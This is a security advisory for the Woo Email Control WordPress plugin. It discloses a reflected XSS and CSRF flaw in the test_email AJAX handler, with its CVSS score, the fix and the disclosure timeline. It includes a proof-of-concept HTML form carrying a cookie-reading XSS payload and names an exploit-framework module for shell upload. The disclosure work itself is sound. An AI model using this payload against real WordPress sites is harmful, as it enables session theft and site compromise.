Homepage
https://wordpress.org/plugins/woo-email-control/
OverviewDue to a lack of encoding and CSRF mitigation in the test_email function found on line 106 of classes/class-wooctrl.php , it is possible to automate a request to the AJAX handler for the wooctrl_send_test_email action which will reflect the specified script back to the end user.
CVSS Score4.8
CVSS Vector(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)
Versions Affected1.01 and below
SolutionUpgrade to version 1.02
Proof of Concept <form method="post" action="http://<target>/wp-admin/admin-ajax.php?action=wooctrl_send_test_email"> <input type="text" name="email_class" value="WC_Email_Customer_New_Account"> <input type="text" name="recipient" value="user@user.com<img src=x onerror=alert(document.cookie)>"> <input type="submit" value="Test"> </form> WordPress Exploit Framework Moduleexploits/woo_email_control_reflected_xss_shell_upload
WPVDB-IDPending
Disclosure Timeline 2016-07-18 : Identified vulnerability, contacted vendor with POC and a patch. 2016-07-18 : Vendor released patch.